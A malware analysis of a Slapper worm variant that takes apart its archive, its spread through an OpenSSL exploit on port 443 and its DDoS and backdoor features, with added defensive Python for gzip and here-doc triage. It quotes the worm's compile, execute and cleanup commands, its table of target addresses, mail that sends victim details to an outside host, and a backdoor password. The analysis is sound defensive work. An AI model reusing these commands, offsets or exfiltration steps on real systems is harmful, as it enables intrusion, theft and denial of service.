Analysis performed on Linux.
md5sum .unlock  -> a03b5be9264651ab30f2223592befb42  .unlock
sha1sum .unlock -> 4b018cdfdbcf71ddaa789e8ecc9ed7700660021a  .unlock
Opening the file in hexl-mode under emacs, we can read the hex sequence at the beginning of the file:

    00000000: 1f8b 0800 ...

Searching for this sequence on Google quickly turns up references to .tgz files. After renaming the file to unlock.tar.gz we confirm that our hypothesis was true: we can extract the files contained in the archive.

A timestamp is stored in gzip files and can be retrieved with the command:

    export TZ=GMT; gzip -lvN unlock.tar.gz

We get the date Sep 20 10:59 (GMT). Note that the date and time displayed depend on the timezone set on the system, so the timezone must be set before calling gzip -lvN.

fixstamp gives us the complete date: Fri Sep 20 10:59:04 2002 (fixstamp can be downloaded from ftp://metalab.unc.edu/pub/Linux/utils/file). We can get rid of the timezone dependency by replacing ctime with asctime(gmtime(&stamp)) in the fixstamp source code.
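To show where gzip -lvN and fixstamp get that timestamp, here is an added example (not part of the original analysis, and not the fixstamp code) that walks the RFC 1952 header, including the optional name field behind -N, and renders MTIME in UTC regardless of $TZ. The sample stream is constructed here with the timestamp fixstamp reported; the worm's own archive is not used.

```python
import gzip
import struct
import zlib
from datetime import datetime, timezone

def build_gzip(payload: bytes, mtime: int, name: bytes) -> bytes:
    # Constructed sample: RFC 1952 member with FNAME set (FLG=0x08); the worm's
    # archive had FLG=0x00 (hex 1f8b 0800), i.e. no original name stored.
    header = struct.pack("<4BIBB", 0x1F, 0x8B, 8, 0x08, mtime, 0, 3) + name + b"\0"
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw deflate body
    body = comp.compress(payload) + comp.flush()
    trailer = struct.pack("<II", zlib.crc32(payload) & 0xFFFFFFFF, len(payload))
    return header + body + trailer

def parse_gzip_header(blob: bytes) -> dict:
    # Walk the fixed 10-byte header plus optional fields, as gzip -lvN / fixstamp do
    if blob[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream (ID1/ID2 mismatch)")
    cm, flg, mtime, _xfl, os_id = struct.unpack_from("<BBIBB", blob, 2)
    if cm != 8:
        raise ValueError(f"unknown compression method {cm}")
    pos = 10
    if flg & 0x04:                                  # FEXTRA: 2-byte length + data
        (xlen,) = struct.unpack_from("<H", blob, pos)
        pos += 2 + xlen
    name = None
    if flg & 0x08:                                  # FNAME: zero-terminated
        end = blob.index(b"\0", pos)
        name = blob[pos:end].decode("latin-1")
        pos = end + 1
    if flg & 0x10:                                  # FCOMMENT: zero-terminated
        pos = blob.index(b"\0", pos) + 1
    if flg & 0x02:                                  # FHCRC: 16-bit header CRC
        pos += 2
    # MTIME is seconds since the Unix epoch; render it in UTC regardless of $TZ,
    # which is what replacing ctime() by asctime(gmtime()) achieves in fixstamp
    stamp = datetime.fromtimestamp(mtime, tz=timezone.utc)
    return {"mtime": mtime, "mtime_utc": stamp.strftime("%a %b %d %H:%M:%S %Y"),
            "name": name, "os": os_id, "header_len": pos}

def payload_of(blob: bytes) -> bytes:
    return gzip.decompress(blob)  # validity check of the constructed stream

# Constructed sample carrying the timestamp fixstamp reported for the worm's archive
SAMPLE_DATA = b"not the worm, just sample bytes\n" * 8
SAMPLE = build_gzip(SAMPLE_DATA, 1032519544, b"unlock.tar")

if __name__ == "__main__":
    print(parse_gzip_header(SAMPLE))  # mtime_utc: Fri Sep 20 10:59:04 2002
```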
The dates and times of the files are the following (GMT):

    -rw-r--r-- root/wheel  70981 2002-09-20 13:28:11 .unlock.c
    -rw-r--r-- root/wheel   2792 2002-09-19 21:57:48 .update.c

The file .unlock.c has a date later than the gzip timestamp. This could indicate that the system date was modified between the modification of .unlock.c and the creation of the tgz archive.

According to the source code, the file was created by contem@efnet and modified by aion@ukr.net, probably on a Windows platform (carriage returns in the file).

In the bugtraq archives on the SecurityFocus site, we find that this is a version of the Slapper worm (the .C variant, according to the names of the temporary files created by the worm - CAN-2002-0656). According to Symantec the worm was discovered on September 13th.
The process name is httpd (the same as Apache):

Line 1423: compilation of the executable file

    gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto;

Lines 1425-1426: execution of the worm

    sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip);
    writem(sockfd,rcv);

The command string is passed to the shell launched by the exploit.
The files are transferred as a uuencoded gzipped tar file. We find it at lines 1416 to 1422, and by analyzing the zhdr and encode functions:

    writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
    zhdr(1);
    encode(sockfd);
    zhdr(0);
    writem(sockfd,"__eof__\n");
    writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu; "
                  "tar xzf /tmp/.unlock -C /tmp/; "

* zhdr adds the gzip header
* encode uuencodes the /tmp/.unlock file (the code of the encode function comes from the uuencode.c source)

The files created during the whole process are:

    /tmp/.unlock.uu
    /tmp/.unlock.c
    /tmp/.update.c
    /tmp/httpd
    /tmp/update
    /tmp/.unlock

The files are erased by the worm (line 1427):

    writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "

The worm scans the HTTP port (port 80):

Line 67:
    #define SCANPORT 80
Line 1923:
    atcp_sync_connect(&clients[n],srv,SCANPORT);

The address of the client is chosen at random within a declared /8 (line 291). If the scan is successful (atcp_sync_check returns ASUCCESS on line 1927), the worm tries the exploit on port 443 (line 1933). Port 443 (HTTPS) is used for the exploit (line 1698).
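For an analyst working from a packet capture of such a session, the transfer sequence above can be carved straight out of the command stream: find the here-doc written with cat > ... << __eof__, uudecode its body and check the magic number of what was dropped. The following is an added example (not from the analysis or the worm's source); the session text and payload are constructed here, with a harmless gzip member standing in for the archive.

```python
import binascii
import gzip
import re

# `cat > PATH << TAG` ... TAG, as written by the worm's shell command stream
HEREDOC = re.compile(r"cat > (\S+) << (\w+);?[ \t]*\n(.*?)\n\2\n", re.S)

def carve_heredocs(session: str) -> dict:
    # Return {target path: literal body} for every here-doc in the captured session
    return {m.group(1): m.group(3) for m in HEREDOC.finditer(session)}

def uudecode(text: str):
    # Minimal uudecode: reads the begin line, stops at 'end', tolerates '`' padding
    lines = text.splitlines()
    m = re.match(r"begin [0-7]+ (\S+)$", lines[0])
    if not m:
        raise ValueError("missing uuencode begin line")
    out = bytearray()
    for line in lines[1:]:
        if line == "end":
            break
        if line and line[0] not in " `":  # a zero-length line closes the data
            out += binascii.a2b_uu(line)
    return m.group(1), bytes(out)

def file_kind(data: bytes) -> str:
    # Magic-number check for what the worm drops (hex 1f8b = gzip)
    return "gzip" if data[:2] == b"\x1f\x8b" else "unknown"

def uuencode(data: bytes, name: str) -> str:
    # Only used to build the constructed sample below
    body = [binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n")
            for i in range(0, len(data), 45)]
    return "\n".join([f"begin 644 {name}", *body, "`", "end"]) + "\n"

# Constructed session mirroring the sequence at lines 1416-1422; the payload is a
# harmless gzip member, not the worm's archive
PAYLOAD = gzip.compress(b"sample archive bytes\n" * 20)
SESSION = ("cat > /tmp/.unlock.uu << __eof__; \n"
           + uuencode(PAYLOAD, ".unlock")
           + "__eof__\n"
           + "uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock -C /tmp/; \n")

def triage(session: str) -> dict:
    # Carve every here-doc, decode it and classify the result for the analyst
    report = {}
    for path, body in carve_heredocs(session).items():
        name, data = uudecode(body)
        report[path] = {"uu_name": name, "kind": file_kind(data), "size": len(data)}
    return report
```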
The worm tries to exploit OpenSSL vulnerabilities, as we can see on lines 1697 to 1762 (advisory CA-2002-23). Searching Google for the keywords bkbk and exploit, you get the original exploit code released on securitybugware: http://www.securitybugware.org/Other/5580.html

The exploit targets various Linux platforms, as we find on lines 1245 to 1269:

    architectures[] = {
        {"Gentoo", "", 0x08086c34},
        {"Debian", "1.3.26", 0x080863cc},
        {"Red-Hat", "1.3.6", 0x080707ec},
        {"Red-Hat", "1.3.9", 0x0808ccc4},
        {"Red-Hat", "1.3.12", 0x0808f614},
        {"Red-Hat", "1.3.12", 0x0809251c},
        {"Red-Hat", "1.3.19", 0x0809af8c},
        {"Red-Hat", "1.3.20", 0x080994d4},
        {"Red-Hat", "1.3.26", 0x08161c14},
        {"Red-Hat", "1.3.23", 0x0808528c},
        {"Red-Hat", "1.3.22", 0x0808400c},
        {"SuSE", "1.3.12", 0x0809f54c},
        {"SuSE", "1.3.17", 0x08099984},
        {"SuSE", "1.3.19", 0x08099ec8},
        {"SuSE", "1.3.20", 0x08099da8},
        {"SuSE", "1.3.23", 0x08086168},
        {"SuSE", "1.3.23", 0x080861c8},
        {"Mandrake", "1.3.14", 0x0809d6c4},
        {"Mandrake", "1.3.19", 0x0809ea98},
        {"Mandrake", "1.3.20", 0x0809e97c},
        {"Mandrake", "1.3.23", 0x08086580},
        {"Slackware", "1.3.26", 0x083d37fc},
        {"Slackware", "1.3.26", 0x080b2100}
    };
A mail is sent to aion@ukr.net after connecting to the server freemail.ukr.net. The information sent is the hostid and hostname of the victim machine and the IP address of the parent machine (sip, which is the argument passed to the program). Lines 122-124:

    sprintf(cmdbuf," hostid: %d \r\n"
                   " hostname: %s \r\n"
                   " att_from: %s \r\n",gethostid(),buffer,sip);

This part was added by aion according to the comments (line 1801), where we find the call to mailme.
The worm communicates with other infected machines via UDP port 4156, as we can see on lines 877 to 921.
Some of the built-in functionalities to attack other networks are:

Distributed Denial of Service:

UDP flood (lines 2205-2245)
- Flooding by sending strings of rp->size bytes (line 2235)
- Targets rp->port, or a random port if rp->port==0 (line 2229)
- Floods for rp->secs seconds

TCP flood (lines 2246-2277)
- Connect and immediate close (lines 2268-2269)
- Targets rp->port, or a random port if rp->port==0
- Floods for rp->secs seconds

IPv6 TCP flood (lines 2279-2306)
- Connect and immediate close (lines 2297-2298)
- Targets rp->port, or a random port if rp->port==0
- Floods for rp->secs seconds

DNS flood (lines 2308-2385)
- DNS queries
- Floods for rp->secs seconds

Scan:

Email scan (lines 2386-2409)
This is a backdoor which executes shell commands when it receives the password aion1981 on port 1052. The code of .update.c is straightforward.
The purpose of these two values is to make the daemon harder to detect on the victim machine. The daemon sleeps most of the time and, as it is not listening on any port, you don't see it when you use lsof:

    lsof | grep LISTEN

The drawback for the attacker is that he has only a time window of UPTIME to connect to the victim machine, so he has to try many times before succeeding.